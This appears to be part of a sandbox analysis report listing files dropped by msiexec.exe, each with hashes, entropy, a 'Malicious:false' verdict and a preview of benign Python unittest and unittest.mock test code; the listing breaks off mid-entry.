                                                                                                                                SSDEEP:1536:gKXzKkj6fCbEooUEnSxC7yJnmMdCv/nmx61p4yanCBahmzSLyr/qJfyjzD5e:gKXzKkj69S2yFmMdCXJThuVYkBf2zFe
                                                                                                                                MD5:21BC1199B7D983E1C8FBC7AB745A48DD
                                                                                                                                SHA1:30DC4099ADA4D5C5B3FC95F2E7B4ADA0F366A4B7
                                                                                                                                SHA-256:E84DD2F750ACF3B592B25988D070C8D4FD4C30C03DF6B21C89AD277D697DBD6B
                                                                                                                                SHA-512:8097ABA7CD873F52E619157795BA0A2C783F16425728B0A9E55EED201DA1648931CF46C0E1123698114789243084F58EC4C07D8942462298BFBF23D6B87A089F
                                                                                                                                Malicious:false
                                                                                                                                Preview:import functools..import sys..import types..import warnings....import unittest....# Decorator used in the deprecation tests to reset the warning registry for..# test isolation and reproducibility...def warningregistry(func):.. def wrapper(*args, **kws):.. missing = [].. saved = getattr(warnings, '__warningregistry__', missing).copy().. try:.. return func(*args, **kws).. finally:.. if saved is missing:.. try:.. del warnings.__warningregistry__.. except AttributeError:.. pass.. else:.. warnings.__warningregistry__ = saved.. return wrapper......class Test_TestLoader(unittest.TestCase):.... ### Basic object tests.. ################################################################.... def test___init__(self):.. loader = unittest.TestLoader().. self.assertEqual([], loader.errors).... ### Tests for TestLoader.loadTestsFr
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17204
                                                                                                                                Entropy (8bit):4.492873103989487
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ff/mfehNKQy2Qw7p1Ulc1dLc1IGQNbWsxyCH/c0F1o1sWhoZWy:f2rA8HEA2
                                                                                                                                MD5:68A84E621FDF3D2C28B8D97B2096B9DE
                                                                                                                                SHA1:D006DDA69693FD7D5E7787958EC5197B742645F1
                                                                                                                                SHA-256:7D7D0BE98378917796E16CAE915E5ADDF09A7FFF307214831311F5E70CD4AD08
                                                                                                                                SHA-512:0CD0FFB96C5470CE28CF99F4E66A6C16174C0EC614EC941B12B3736D90003B7AC83A18F49A0DE634ABC664D1573446A552A29B8EE8F43D562AEFEACFFD28E0CB
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io....import os..import sys..import subprocess..from test import support..import unittest..import unittest.test..from unittest.test.test_result import BufferedWriter......class Test_TestProgram(unittest.TestCase):.... def test_discovery_from_dotted_path(self):.. loader = unittest.TestLoader().... tests = [self].. expectedPath = os.path.abspath(os.path.dirname(unittest.test.__file__)).... self.wasRun = False.. def _find_tests(start_dir, pattern):.. self.wasRun = True.. self.assertEqual(start_dir, expectedPath).. return tests.. loader._find_tests = _find_tests.. suite = loader.discover('unittest.test').. self.assertTrue(self.wasRun).. self.assertEqual(suite._tests, tests).... # Horrible white box test.. def testNoExit(self):.. result = object().. test = object().... class FakeRunner(object):.. def run(self, test):.. self.test = tes
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):53607
                                                                                                                                Entropy (8bit):4.504110903105085
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:KP8QAWA4LWvmRUF9Hi8JPdf9ovj3VDy03xVCnc0l2e1rRRktDh2Xw9iDzqgbX4QI:KPu4LWv1vz1rCzhFMT4kbJlo/
                                                                                                                                MD5:E1987CD306844FD1D9A615D42BFAE60C
                                                                                                                                SHA1:010B467180FA6CA9FF224891561939F928FAA6DD
                                                                                                                                SHA-256:B9084FD1042AF2BD3D15263430A81D5556904AD4F6430A6B9C94DBBE1BDCF777
                                                                                                                                SHA-512:C3A68FF2F8080ADE23CD8C918E0E55F256DEDE092B541D8ED7C901BE095375A7752CA9EC2B68EA9AE2427C80AA9558B0FC7B5C1D308D13B5E45B3FC93AAD16B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io..import sys..import textwrap....from test.support import warnings_helper, captured_stdout, captured_stderr....import traceback..import unittest..from unittest.util import strclass......class MockTraceback(object):.. class TracebackException:.. def __init__(self, *args, **kwargs):.. self.capture_locals = kwargs.get('capture_locals', False).. def format(self):.. result = ['A traceback'].. if self.capture_locals:.. result.append('locals').. return result....def restore_traceback():.. unittest.result.traceback = traceback......def bad_cleanup1():.. print('do cleanup1').. raise TypeError('bad cleanup1')......def bad_cleanup2():.. print('do cleanup2').. raise ValueError('bad cleanup2')......class BufferedWriter:.. def __init__(self):.. self.result = ''.. self.buffer = ''.... def write(self, arg):.. self.buffer += arg.... def flush(self):.. self.result += s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49703
                                                                                                                                Entropy (8bit):4.399526759939002
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:myWabl74wYOrEU+SaGSHuZtE1EBEgMXzrLUb9:mJwYOrEU+aSH11QEgMXzrLUb9
                                                                                                                                MD5:37B4CAA4213A5E7E7456D8660235ADFB
                                                                                                                                SHA1:78127E61BABABB5A026254FE5C6055718EFF408B
                                                                                                                                SHA-256:7173B827E2D90DDD622276AEC178C53861A86A23FDEB05130A30B31E9FD84110
                                                                                                                                SHA-512:ADE99A7ACE93D6EBC25A30369BA7C37601577573A148908422916A4FB89549F070B9CE288C45986D6B71A22FB36210371AEEAF0C492D0B47C3A1070882128837
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io..import os..import sys..import pickle..import subprocess..from test import support....import unittest..from unittest.case import _Outcome....from unittest.test.support import (LoggingResult,.. ResultWithNoStartTestRunStopTestRun)......def resultFactory(*_):.. return unittest.TestResult()......def getRunner():.. return unittest.TextTestRunner(resultclass=resultFactory,.. stream=io.StringIO())......def runTests(*cases):.. suite = unittest.TestSuite().. for case in cases:.. tests = unittest.defaultTestLoader.loadTestsFromTestCase(case).. suite.addTests(tests).... runner = getRunner().... # creating a nested suite exposes some potential bugs.. realSuite = unittest.TestSuite().. realSuite.addTest(suite).. # adding empty suites to the end exposes potential bugs.. suite.addTest(unittest.TestSuite()).. realSuite.addTest(unittest.TestSuite()).. return runner.run(realSu
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17010
                                                                                                                                Entropy (8bit):4.1617988264296395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:KU1TRqXkM52xprISndtKP/+f/XP/Kt/tvSuKu/P/3Q/P/+0ifqnlBYfmy:KcqXZ0xprVQaCp
                                                                                                                                MD5:D38AF502442B49FD8F0048BA779368C5
                                                                                                                                SHA1:1721716D9F1981614731636DAFCB7FE926E1EE14
                                                                                                                                SHA-256:3598BD4B27C7FC42D6BE2A96A08DC6DDEC1C341F04E7CFF15A2093C2623C1CBA
                                                                                                                                SHA-512:3519229E388AD2025A99B627AE4CAD35FF2753835EC8BDE38D53D2555095FAB5967D9D08651E9C8BF3847887E7216CB2D9F9C81FF1165BD5E4E30A9E251953BA
                                                                                                                                Malicious:false
                                                                                                                                Preview:import io..import sys....import unittest......def resultFactory(*_):.. return unittest.TestResult()......class TestSetups(unittest.TestCase):.... def getRunner(self):.. return unittest.TextTestRunner(resultclass=resultFactory,.. stream=io.StringIO()).. def runTests(self, *cases):.. suite = unittest.TestSuite().. for case in cases:.. tests = unittest.defaultTestLoader.loadTestsFromTestCase(case).. suite.addTests(tests).... runner = self.getRunner().... # creating a nested suite exposes some potential bugs.. realSuite = unittest.TestSuite().. realSuite.addTest(suite).. # adding empty suites to the end exposes potential bugs.. suite.addTest(unittest.TestSuite()).. realSuite.addTest(unittest.TestSuite()).. return runner.run(realSuite).... def test_setup_class(self):.. class Test(unittest.TestCase):.. setUpCalled = 0..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20610
                                                                                                                                Entropy (8bit):4.25473634203396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:3PrnHM9dMoY4YWCq093g33rDtmTqCk/iibCs/x9CcsGLes+:ZVh
                                                                                                                                MD5:5C08794D4E008E3ECBCF8670627DCC5D
                                                                                                                                SHA1:A0FB5F358783711816DF450E150EE19DDBA815D6
                                                                                                                                SHA-256:333649BEEEA76EBEEC13A3D8672AE6C43AAF12E966190160DC15AF9A97856434
                                                                                                                                SHA-512:3D6F415F0E8D0AB92B9F8DC0DF0305A1622DF27DF61A16352B341225493DD9EEEA2850503C0BFC0829C1F0015A81078A3532BEDE834DA0CA6EA6FCDD244B6DFF
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest....from unittest.test.support import LoggingResult......class Test_TestSkipping(unittest.TestCase):.... def test_skipping(self):.. class Foo(unittest.TestCase):.. def defaultTestResult(self):.. return LoggingResult(events).. def test_skip_me(self):.. self.skipTest("skip").. events = [].. result = LoggingResult(events).. test = Foo("test_skip_me").. self.assertIs(test.run(result), result).. self.assertEqual(events, ['startTest', 'addSkip', 'stopTest']).. self.assertEqual(result.skipped, [(test, "skip")]).... events = [].. result = test.run().. self.assertEqual(events, ['startTestRun', 'startTest', 'addSkip',.. 'stopTest', 'stopTestRun']).. self.assertEqual(result.skipped, [(test, "skip")]).. self.assertEqual(result.testsRun, 1).... # Try letting setUp skip the test now... class Foo(unitte
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15631
                                                                                                                                Entropy (8bit):4.442126265306524
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:106FuA8Rd3eySW2g7XUDiEz9iWAprG/I/s/huF/BAy:10g8R9eypLEz09B/v
                                                                                                                                MD5:3538F274214B97C3F83AA6B36B7FFDDC
                                                                                                                                SHA1:79A7533F9F3D793C8762CE0D5B1921A17E423962
                                                                                                                                SHA-256:417922D583C5B4DB23EAE0EA561D7BD88007D6DE350E42ABC96B31EC91E2866B
                                                                                                                                SHA-512:A918880B11907AB35068CA0ECBD774E88D3246EFF68527BC68F5B8B15D7D43F77361412A0FD6F40674592C0D21CBCF9D3023A887BA9AEC28096C90F54C871861
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest....import gc..import sys..import weakref..from unittest.test.support import LoggingResult, TestEquality......### Support code for Test_TestSuite..################################################################....class Test(object):.. class Foo(unittest.TestCase):.. def test_1(self): pass.. def test_2(self): pass.. def test_3(self): pass.. def runTest(self): pass....def _mk_TestSuite(*names):.. return unittest.TestSuite(Test.Foo(n) for n in names)....################################################################......class Test_TestSuite(unittest.TestCase, TestEquality):.... ### Set up attributes needed by inherited tests.. ################################################################.... # Used by TestEquality.test_eq.. eq_pairs = [(unittest.TestSuite(), unittest.TestSuite()).. ,(unittest.TestSuite(), unittest.TestSuite([])).. ,(_mk_TestSuite('test_1'), _mk_TestSuite('test_1'))].... # Us
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):482
                                                                                                                                Entropy (8bit):4.4642799143390866
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:AIZFaeFyl6RsAsKVDmAArUsi+MWELSgQK9V:AGagHRCKVDww3PSaf
                                                                                                                                MD5:A2A5DCFDF98E92836C154A8BBBB85882
                                                                                                                                SHA1:9BA6AFA5E19CD074C0088A8F1616A83C1106ED5D
                                                                                                                                SHA-256:7F23831918073DACB0BCB4FED102C6C30A4ED6CB84F202A5ABAFC7360EBFF042
                                                                                                                                SHA-512:41BF0D23FE1DF20BE0A14E46403498E8741B8264A3305B138AA6BD9815AC86F9B0EEF38BDAA4E1BA96597E3566B0DDDEA4BBE21890E9917643478448DF8C1C31
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import sys..import unittest......here = os.path.dirname(__file__)..loader = unittest.defaultTestLoader....def load_tests(*args):.. suite = unittest.TestSuite().. for fn in os.listdir(here):.. if fn.startswith("test") and fn.endswith(".py"):.. modname = "unittest.test.testmock." + fn[:-3].. __import__(modname).. module = sys.modules[modname].. suite.addTest(loader.loadTestsFromModule(module)).. return suite..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):641
                                                                                                                                Entropy (8bit):4.373230039466128
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:03u6zGvoMgkfZiGQdVciFkHgsycYhMaF91Pa02aLB:03DGvXtBi1g/6MMTipa1
                                                                                                                                MD5:BC7C5D9A6799282563C7151C0C9250F9
                                                                                                                                SHA1:7F0AE4E282C3D1A8CD6B9F30F6ADD429843BC7A6
                                                                                                                                SHA-256:7593367BA4055F44C2D42866CBFE933F09A56E5D5680BF121D8D9CA624846E7C
                                                                                                                                SHA-512:A091C9A9524B4B0A73EB4C35957BF923DDADD2CB8BCF8797C20461B2827A4159B95DDD1AC7233297AFEAC2C523DA371F59C0B638800FC0ACC2967887C489763C
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import unittest......def load_tests(loader, standard_tests, pattern):.. # top level directory cached on loader instance.. this_dir = os.path.dirname(__file__).. pattern = pattern or "test*.py".. # We are inside unittest.test.testmock, so the top-level is three notches up.. top_level_dir = os.path.dirname(os.path.dirname(os.path.dirname(this_dir))).. package_tests = loader.discover(start_dir=this_dir, pattern=pattern,.. top_level_dir=top_level_dir).. standard_tests.addTests(package_tests).. return standard_tests......if __name__ == '__main__':.. unittest.main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):284
                                                                                                                                Entropy (8bit):4.6331576131729975
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:70iR7koaMSoGoKamBNoqNoGggwRAj6t2HJnWWk9JNrixWjLNHRJweVEOTuv:70kkrMyXnKqx4RAj6cHJWrZQexVDg
                                                                                                                                MD5:BB2110382853F9F33D6D72AA8CCE6DB7
                                                                                                                                SHA1:9F2464D1921F0F6D124A93BC74DB231334F94C4E
                                                                                                                                SHA-256:BBACB8395CA15547BE405A652C6C6EC07443C5021F31F3366DDE9DBA5ACF752E
                                                                                                                                SHA-512:FB8AC7E699C4E6C6F3D0D50E6D8A6FEF2B5AD06087FC831527DF5B37B87A9145972808F57F8A1DB3D46A546F5B9C9B67DE1462D375320EA79224382E276B78B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:target = {'foo': 'FOO'}......def is_instance(obj, klass):.. """Version of is_instance that doesn't access __class__""".. return issubclass(type(obj), klass)......class SomeClass(object):.. class_attribute = None.... def wibble(self): pass......class X(object):.. pass..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):38315
                                                                                                                                Entropy (8bit):4.5596471522701165
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:SBY4ZPOE2oNHp7qhY7d/E69UmEIPl0c9l/e8KLkw/AhfPYhfKJlJebiG5fq23jZ9:SBY4ZPOE2oNHp7qhY7d/E69UmEQl0k2v
                                                                                                                                MD5:86BA6D2E6783A3D5F61D63958185E895
                                                                                                                                SHA1:454E93E8D5BEEF5B893EB55FD1F81496174823C2
                                                                                                                                SHA-256:09E96A70567ACE6AD52A0387AFF6B2CE8A11C57DEE9A814E5EAEA79284E5B697
                                                                                                                                SHA-512:711D269E0A8398DE77976DDF19AB8F4E0E13D5A65C4B515348BB73F6042E79D30B05E4B3FFC4A603395AE8F01A6367BB8C723CF3CBC2C4342E02270036C22D99
                                                                                                                                Malicious:false
                                                                                                                                Preview:import asyncio..import gc..import inspect..import re..import unittest..from contextlib import contextmanager..from test import support....support.requires_working_socket(module=True)....from asyncio import run, iscoroutinefunction..from unittest import IsolatedAsyncioTestCase..from unittest.mock import (ANY, call, AsyncMock, patch, MagicMock, Mock,.. create_autospec, sentinel, _CallList)......def tearDownModule():.. asyncio.set_event_loop_policy(None)......class AsyncClass:.. def __init__(self): pass.. async def async_method(self): pass.. def normal_method(self): pass.... @classmethod.. async def async_class_method(cls): pass.... @staticmethod.. async def async_static_method(): pass......class AwaitableClass:.. def __await__(self): yield....async def async_func(): pass....async def async_func_args(a, b, *, c): pass....def normal_func(): pass....class NormalClass(object):.. def a(self): pass......async_foo_name = f'{__name__}.Async
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4417
                                                                                                                                Entropy (8bit):4.515442092893319
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:rfWXjnVnJKJPQzBP+n2QhvFvQhqa8QfmQIK3D54vpHBo/ybjUKA:EIo+nxveqaVrD2phonKA
                                                                                                                                MD5:93D47D45EF67DB5D1310F5176A7E064C
                                                                                                                                SHA1:F1F426C1AD9DA1A7F85A666DDD8C792BCD26F82C
                                                                                                                                SHA-256:729C5A3D6F25A8376C265CB56BEC4DCD8D4D82626B047B5018AACF4B0E6C789E
                                                                                                                                SHA-512:F8B5C783C2015F0D3C41261820BCB261DB61620A9BE33188DB4214C21933BB3049A690AD7D729E30889D2ECE2D869021136CBF15F7D0B0FC0C30192894E7702D
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright (C) 2007-2012 Michael Foord & the mock team..# E-mail: fuzzyman AT voidspace DOT org DOT uk..# http://www.voidspace.org.uk/python/mock/....import unittest..from unittest.test.testmock.support import is_instance, X, SomeClass....from unittest.mock import (.. Mock, MagicMock, NonCallableMagicMock,.. NonCallableMock, patch, create_autospec,.. CallableMixin..)........class TestCallable(unittest.TestCase):.... def assertNotCallable(self, mock):.. self.assertTrue(is_instance(mock, NonCallableMagicMock)).. self.assertFalse(is_instance(mock, CallableMixin))...... def test_non_callable(self):.. for mock in NonCallableMagicMock(), NonCallableMock():.. self.assertRaises(TypeError, mock).. self.assertFalse(hasattr(mock, '__call__')).. self.assertIn(mock.__class__.__name__, repr(mock))...... def test_hierarchy(self):.. self.assertTrue(issubclass(MagicMock, Mock)).. self.assertTrue(issubclass(NonCallabl
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):34775
                                                                                                                                Entropy (8bit):4.564874571570824
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:uHQUHGpc4ACphJRTuuxRYQ4YEahf/K4t8j4rcQPFk2d0nS7DXNwinb5JtpQp+pec:uHQUHGpc4ACphJRTuux6Q4YEe/Lt8j4b
                                                                                                                                MD5:DC68BEA352AC9E462EC8A11511185EA1
                                                                                                                                SHA1:44D5702CE5CC967796C2EA3581D44B6DEB65E3E6
                                                                                                                                SHA-256:A91AA5EE2E656D09F41BACB40ADCE3D2E85D867683BFEA1680F0E74367F929D7
                                                                                                                                SHA-512:95AF008A6AC658F969B50BF8ECCF02891847731E6430CFE86B7DD3B30322CF769C67006B045A0AE57BDE2A78EC6BF08D922A5DB19A585CB0D472206C79F93F97
                                                                                                                                Malicious:false
                                                                                                                                Preview:import inspect..import time..import types..import unittest....from unittest.mock import (.. call, _Call, create_autospec, MagicMock,.. Mock, ANY, _CallList, patch, PropertyMock, _callable..)....from datetime import datetime..from functools import partial....class SomeClass(object):.. def one(self, a, b): pass.. def two(self): pass.. def three(self, a=None): pass........class AnyTest(unittest.TestCase):.... def test_any(self):.. self.assertEqual(ANY, object()).... mock = Mock().. mock(ANY).. mock.assert_called_with(ANY).... mock = Mock().. mock(foo=ANY).. mock.assert_called_with(foo=ANY).... def test_repr(self):.. self.assertEqual(repr(ANY), '<ANY>').. self.assertEqual(str(ANY), '<ANY>')...... def test_any_and_datetime(self):.. mock = Mock().. mock(datetime.now(), foo=datetime.now()).... mock.assert_called_with(ANY, foo=ANY)...... def test_any_mock_calls_comparison_order(self):
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16752
                                                                                                                                Entropy (8bit):4.6082096217435655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:zBEN69GlBO/96ZnHn8r+sn8/P4FBgFBjhLgb2xTYVdBGWojDOlTy:zCNJUS6QNhLgb2WdBuDOle
                                                                                                                                MD5:F3A835768CC4468435C261C2A35FED9E
                                                                                                                                SHA1:6F7C633A3B7E6AB91609CBEFD7D362A35B3AC98E
                                                                                                                                SHA-256:B4529D0B8F9F67CAF84613EF7892DC3BFA031FA70EAB1683869B8DB3E18CE1DE
                                                                                                                                SHA-512:27F39B9EC0746635FEA9B05AE571F686974E25CEB419D94571CD65B88EFB03DD267C3D627C141FBEE2F4A877630809043651C2EA2A2C237FD8371B298F193784
                                                                                                                                Malicious:false
                                                                                                                                Preview:import math..import unittest..import os..from asyncio import iscoroutinefunction..from unittest.mock import AsyncMock, Mock, MagicMock, _magics........class TestMockingMagicMethods(unittest.TestCase):.... def test_deleting_magic_methods(self):.. mock = Mock().. self.assertFalse(hasattr(mock, '__getitem__')).... mock.__getitem__ = Mock().. self.assertTrue(hasattr(mock, '__getitem__')).... del mock.__getitem__.. self.assertFalse(hasattr(mock, '__getitem__'))...... def test_magicmock_del(self):.. mock = MagicMock().. # before using getitem.. del mock.__getitem__.. self.assertRaises(TypeError, lambda: mock['foo']).... mock = MagicMock().. # this time use it first.. mock['foo'].. del mock.__getitem__.. self.assertRaises(TypeError, lambda: mock['foo'])...... def test_magic_method_wrapping(self):.. mock = Mock().. def f(self, name):.. return self, 'fish'..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):78566
                                                                                                                                Entropy (8bit):4.52292355473322
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:K4+dVVBqoiku8CNjuM+AnHLmMenn+t6gWkUIwrQiKjRmgb2fEM4M1ZIdBfqAoeKO:K4+dVVBqoiku8CNjuM+AnHLmMenn+t66
                                                                                                                                MD5:750DD3636BD603127F855B46B2AFE000
                                                                                                                                SHA1:CA2AF9EF771E522CD5CE608B825DDD409ABB862A
                                                                                                                                SHA-256:79DCEDB267E4BA9C3A0D6BC463A2BD3231C628C6CCF74CE9FBE806134B345301
                                                                                                                                SHA-512:01B2D9011CDEDA5591E304B244993C65B5A6BC73FBB7823A89D49F0CA2C09E09452BA42C9EB2BC403A6EA7C375D95CC3144408D39224C099EBDB4806B2679220
                                                                                                                                Malicious:false
                                                                                                                                Preview:import copy..import re..import sys..import tempfile....from test.support import ALWAYS_EQ..import unittest..from unittest.test.testmock.support import is_instance..from unittest import mock..from unittest.mock import (.. call, DEFAULT, patch, sentinel,.. MagicMock, Mock, NonCallableMock,.. NonCallableMagicMock, AsyncMock, _Call, _CallList,.. create_autospec, InvalidSpecError..)......class Iter(object):.. def __init__(self):.. self.thing = iter(['this', 'is', 'an', 'iter']).... def __iter__(self):.. return self.... def next(self):.. return next(self.thing).... __next__ = next......class Something(object):.. def meth(self, a, b, c, d=None): pass.... @classmethod.. def cmeth(cls, a, b, c, d=None): pass.... @staticmethod.. def smeth(a, b, c, d=None): pass......class Typos():.. autospect = None.. auto_spec = None.. set_spec = None......def something(a): pass......class MockTest(unittest.TestCase):.... def test_all(self)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):61094
                                                                                                                                Entropy (8bit):4.496592347012656
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:mztDuNVeqZ/RnErdA3racS5lB3473NB3PO:mpDuNVeqbErdA3racS5lB3473NBfO
                                                                                                                                MD5:8013D17E7695BAE92A405B9293288059
                                                                                                                                SHA1:94F8F4E7F7F21F8AD1744E64C6FF7BE2969685E1
                                                                                                                                SHA-256:B5C5E3BBC3756A4696C1BAF4321BF7F406487AB40628905729B7A585BFF5364C
                                                                                                                                SHA-512:125007BD6E60098121C57524EB69CEB44F8F25CB3EA615566255BF0A1D48AB83A9921541C6BEDF43B5E7F5E2AFC3BA7A453E2B32F3D89B2697EA8AFF74803FB5
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright (C) 2007-2012 Michael Foord & the mock team..# E-mail: fuzzyman AT voidspace DOT org DOT uk..# http://www.voidspace.org.uk/python/mock/....import os..import sys..from collections import OrderedDict....import unittest..from unittest.test.testmock import support..from unittest.test.testmock.support import SomeClass, is_instance....from test.test_importlib.util import uncache..from unittest.mock import (.. NonCallableMock, CallableMixin, sentinel,.. MagicMock, Mock, NonCallableMagicMock, patch, _patch,.. DEFAULT, call, _get_target..)......builtin_string = 'builtins'....PTModule = sys.modules[__name__]..MODNAME = '%s.PTModule' % __name__......def _get_proxy(obj, get_only=True):.. class Proxy(object):.. def __getattr__(self, name):.. return getattr(obj, name).. if not get_only:.. def __setattr__(self, name, value):.. setattr(obj, name, value).. def __delattr__(self, name):.. delattr(obj, name).. Proxy.__
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7606
                                                                                                                                Entropy (8bit):4.425008960402742
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:FrWyXphelAamOAOhRD3gbCfm/VT3MPquIaztdm0A:phelAwAOhRDQbCfm/lVGdm0A
                                                                                                                                MD5:A8281CA56525B781544E5EB79E60AB96
                                                                                                                                SHA1:4E01AE78257DE3E0D3E1C3E9FD82D7C9AB53B358
                                                                                                                                SHA-256:D87880FFF621DD38CDB05638D88026E3A6A8FFA05A2BC8507DA606D4D6FADE7A
                                                                                                                                SHA-512:D4472052A4662B13422FEAFD2C06DC56C17E5095D620C2D8314FE3F546CE22670D03EE1A71D2DBBF9865495D44122CB33067CC636CD7F2C030C7ADEF7C10F2F2
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest..from unittest import mock......class SampleObject:.... def method_sample1(self): pass.... def method_sample2(self): pass......class TestSealable(unittest.TestCase):.... def test_attributes_return_more_mocks_by_default(self):.. m = mock.Mock().... self.assertIsInstance(m.test, mock.Mock).. self.assertIsInstance(m.test(), mock.Mock).. self.assertIsInstance(m.test().test2(), mock.Mock).... def test_new_attributes_cannot_be_accessed_on_seal(self):.. m = mock.Mock().... mock.seal(m).. with self.assertRaises(AttributeError):.. m.test.. with self.assertRaises(AttributeError):.. m().... def test_new_attributes_cannot_be_set_on_seal(self):.. m = mock.Mock().... mock.seal(m).. with self.assertRaises(AttributeError):.. m.test = 1.... def test_existing_attributes_can_be_set_on_seal(self):.. m = mock.Mock().. m.test.test2 = 1.... mock.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1366
                                                                                                                                Entropy (8bit):4.548392548737423
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:oX/FN8RZM2axKU2GeSAx7HhIyzbEHHoYop2/a1:oXAW/xcGKzhh8nDop2/a1
                                                                                                                                MD5:3A650B34DB1CB7FC66AF23E20A20933C
                                                                                                                                SHA1:FC70FF19F14FEC79F710D5E6616AA38A79890708
                                                                                                                                SHA-256:41E5463CE7258E2D6D80ACE032F052A3BFAB7B7209BE7C344EDA776CB566146F
                                                                                                                                SHA-512:50B2A68256D8A31072B7F6586A129FD88120FBEFBCDBF7EBC6B1E5E704A3B621D4DD89190D9B833D905E8049087D8548B06C0481B6884E721D6C6587C720DA7F
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest..import copy..import pickle..from unittest.mock import sentinel, DEFAULT......class SentinelTest(unittest.TestCase):.... def testSentinels(self):.. self.assertEqual(sentinel.whatever, sentinel.whatever,.. 'sentinel not stored').. self.assertNotEqual(sentinel.whatever, sentinel.whateverelse,.. 'sentinel should be unique')...... def testSentinelName(self):.. self.assertEqual(str(sentinel.whatever), 'sentinel.whatever',.. 'sentinel name incorrect')...... def testDEFAULT(self):.. self.assertIs(DEFAULT, sentinel.DEFAULT).... def testBases(self):.. # If this doesn't raise an AttributeError then help(mock) is broken.. self.assertRaises(AttributeError, lambda: sentinel.__bases__).... def testPickle(self):.. for proto in range(pickle.HIGHEST_PROTOCOL+1):.. with self.subTest(protocol=proto):.. pickled = pickle.dumps(s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12576
                                                                                                                                Entropy (8bit):4.564612880987839
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:AdkHY8wiw3p2wz3Cy9Cv97jyP9PUJCs8mC+PBFAy:WkHY8wiwZ2wrCy9Cv97j89OCQC+PBFv
                                                                                                                                MD5:280BEEF5A5CF72CC778C57CA6EC4F497
                                                                                                                                SHA1:FDCAA4B689081583CD77931218868D82CAB68B9A
                                                                                                                                SHA-256:3A930C0D7E2A0BD9FEBF5D3A794A729CD802FEAC3EB634BE8538BC32959B29C5
